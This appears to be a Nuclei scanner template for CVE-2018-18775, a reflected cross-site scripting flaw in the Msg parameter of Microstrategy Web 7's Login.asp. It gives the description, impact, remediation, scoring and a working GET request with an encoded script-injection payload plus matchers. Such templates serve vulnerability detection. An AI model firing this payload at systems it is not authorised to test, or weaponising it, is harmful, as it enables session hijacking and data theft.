漏洞描述
Microstrategy Web 7 does not sufficiently encode user-controlled inputs, resulting in cross-site scripting via the Login.asp Msg parameter.
CVE-2018-18775: Microstrategy Web 7 - Cross-Site Scripting
PoC代码[已公开]
id: CVE-2018-18775
info:
name: Microstrategy Web 7 - Cross-Site Scripting
author: 0x_Akoko
severity: medium
description: Microstrategy Web 7 does not sufficiently encode user-controlled inputs, resulting in cross-site scripting via the Login.asp Msg parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Apply the latest security patches or updates provided by Microstrategy to fix the XSS vulnerability in the Web 7 application.
reference:
- https://www.exploit-db.com/exploits/45755
- http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-18775
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-18775
cwe-id: CWE-79
epss-score: 0.2032
epss-percentile: 0.95331
cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: microstrategy
product: microstrategy_web
tags: cve2018,cve,microstrategy,xss,edb,packetstorm,intrusive
http:
- method: GET
path:
- "{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><script>alert(/{{randstr}}/);</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100d9d6ea42b078aeed2a5908d1045dff4dd4bf6cb8e0980fb2cf0b08d8380622bb02200da7096b48db0430796672f9eb651a354ac2b21871d864a3df7186c6572d38dd:922c64590222798bb761d5b6d8e72950